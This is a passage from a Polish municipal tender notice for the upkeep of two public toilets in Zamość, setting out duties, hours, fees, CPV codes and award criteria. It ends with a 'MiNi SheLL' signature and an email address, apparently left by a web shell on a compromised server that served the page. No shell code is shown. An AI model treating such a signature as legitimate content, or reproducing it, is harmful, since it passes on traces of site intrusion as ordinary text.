3.	Sprawowanie bieżącego nadzoru nad powierzonym mieniem Miasta poprzez codzienne sprawdzenia prawidłowego działania wszystkich urządzeń sanitarnych i elektrycznych zainstalowanych w szalecie oraz niezwłoczne poinformowanie Zamawiającego o wystąpieniu ewentualnych uszkodzeń.
4.	Powierzchniowe oczyszczanie szaletu poprzez codzienne: 
a)	 zamiatanie i mycie na mokro powierzchni płaskich,
b)	 sprzątanie i dezynfekowanie urządzeń sanitarnych (umywalki, pisuary, sedesy),
c)	 czyszczenie baterii umywalkowych,
d)	 opróżnianie śmietników.
5.	Zgłaszania do Komendy Miejskiej Policji lub Straży Miejskiej dewastacji szaletu oraz niezwłoczne poinformowanie Zamawiającego o podjętej decyzji przez ww. organy.
6.	Przedstawianie do Wydziału Gospodarki Komunalnej i Ochrony Środowiska comiesięcznego sprawozdania z ilości osób korzystających z szaletu miejskiego (z podziałem na kabinę i pisuar).
3.	Zebrana przez Wykonawcę opłata za korzystanie z szaletu miejskiego, określona w pkt 2 ppkt.1 SIWZ, w całości stanowić będzie dochód Wykonawcy, który należy uwzględnić przy kalkulacji ceny w składanej ofercie na usługę utrzymania szaletu miejskiego znajdującego się przy ulicy Reja w Zamościu.
4.	Wykonawca zobowiązany jest do zawarcia we własnym imieniu i na własny rachunek umów:
a)	na dostawę energii elektrycznej do szaletu,
b)	na odbiór odpadów komunalnych, 
c)	na dostawę wody i odbiór  nieczystości ciekłych z szaletu.
5.	W związku z wykonaniem remontu szaletu w ramach projektu pn.: Rewitalizacja Rynku Nowego Miasta i jego otoczenia przekazany obiekt objęty jest gwarancją należytego wykonania umowy przez Wykonawcę robót budowlanych. W związku z tym Zamawiający informuje, że na terenie ww. obiektu nie można dokonywać żadnych zmian.
6.	Szczegółowy zakres, terminy, rozmiar i kolejność wykonania poszczególnych prac został określony w załączniku nr 7a do SIWZ oraz w projekcie umowy stanowiącym załącznik nr 6a do SIWZ. 
7.	Szczegółowa lokalizacja przedmiotu zadania została określona w załączniku nr 8a (Wyrys działki z ewidencji gruntów i budynków)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.12.00-8, 90.60.00.00-3, 50.87.00.00-4, 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie Nr 2: Szalet miejski przy ul. Szczebrzeskiej 3 w Zamościu..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie Nr 2: Szalet miejski przy ul. Szczebrzeskiej 3 w Zamościu.
1.	Przedmiotem zamówienia jest świadczenie usługi utrzymania szaletu miejskiego znajdującego się w części budynku przy ul. Szczebrzeskiej 3 w Zamościu na działce w arkuszu mapy 45 o numerze geodezyjnym 6 (wyrys działki stanowi Załącznik Nr 8b do SIWZ).
2.	Zakres usługi obejmuje wykonanie następującego rodzaju prac:
1.	Otwieranie szaletu w sezonie jesienno - zimowym (od października do marca) 
w godzinach 7:00 - 16:00 oraz w sezonie wiosenno - letnim ( od kwietnia do września) 7:00 - 20:00 siedem dni w tygodniu wraz z pobieraniem opłaty za korzystanie z szaletu zgodnie z obowiązującym Zarządzeniem Prezydenta Miasta Zamość w sprawie opłaty za korzystanie z szaletów publicznych na terenie miasta Zamość ( zebrana opłata w całości stanowić będzie dochód Wykonawcy zgodnie z pkt. 3 SIWZ).
2.	Utrzymanie zimowe przekazanego terenu poprzez:
a)	usuwanie śniegu, lodu, błota, sopli, 
b)	likwidacja śliskości chodnika prowadzącego do budynku przez posypywanie piaskiem,
c)	likwidacja śliskości powierzchni płaskich wewnątrz budynku poprzez wycieranie do sucha.
3.	Sprawowanie bieżącego nadzoru nad powierzonym mieniem Miasta poprzez codzienne sprawdzenia prawidłowego działania wszystkich urządzeń sanitarnych i elektrycznych zainstalowanych w szalecie oraz niezwłoczne poinformowanie Zamawiającego o wystąpieniu ewentualnych uszkodzeń.
4.	Powierzchniowe oczyszczanie szaletu poprzez codzienne: 
a)	zamiatanie i mycie na mokro powierzchni płaskich,
b)	sprzątanie i dezynfekowanie urządzeń sanitarnych (umywalki, pisuary, sedesy),
c)	czyszczenie baterii umywalkowych,
d)	opróżnianie śmietników.
5.	Zgłaszania do Komendy Miejskiej Policji lub Straży Miejskiej dewastacji szaletu oraz niezwłoczne poinformowanie Zamawiającego o podjętej decyzji przez ww. organy.
6.	Przedstawianie do Wydziału Gospodarki Komunalnej i Ochrony Środowiska comiesięcznego sprawozdania z ilości osób korzystających z szaletu miejskiego (z podziałem na kabinę i pisuar).
3.	Zebrana przez Wykonawcę opłata za korzystanie z szaletu miejskiego, określona w pkt 2 ppkt.1 SIWZ, w całości stanowić będzie dochód Wykonawcy, który należy uwzględnić przy kalkulacji ceny w składanej ofercie na usługę utrzymania szaletu miejskiego znajdującego się przy ulicy Szczebrzeskiej w Zamościu.
4.	Wykonawca zobowiązany jest do zawarcia we własnym imieniu i na własny rachunek umów:
a)	na dostawę energii elektrycznej do szaletu,
b)	na odbiór odpadów komunalnych,
c)	 na dostawę wody i odbiór  nieczystości ciekłych z szaletu.
5.	Szczegółowy zakres, terminy, rozmiar i kolejność wykonania poszczególnych prac został określony w załączniku nr 7b do SIWZ oraz projekcie umowy stanowiącym załącznik nr 6b do SIWZ.
6.	 Szczegółowa lokalizacja przedmiotu zadania została określona w załączniku nr 8b (Wyrys z ewidencji gruntów i budynków)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.12.00-8, 90.60.00.00-3, 50.87.00.00-4, 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com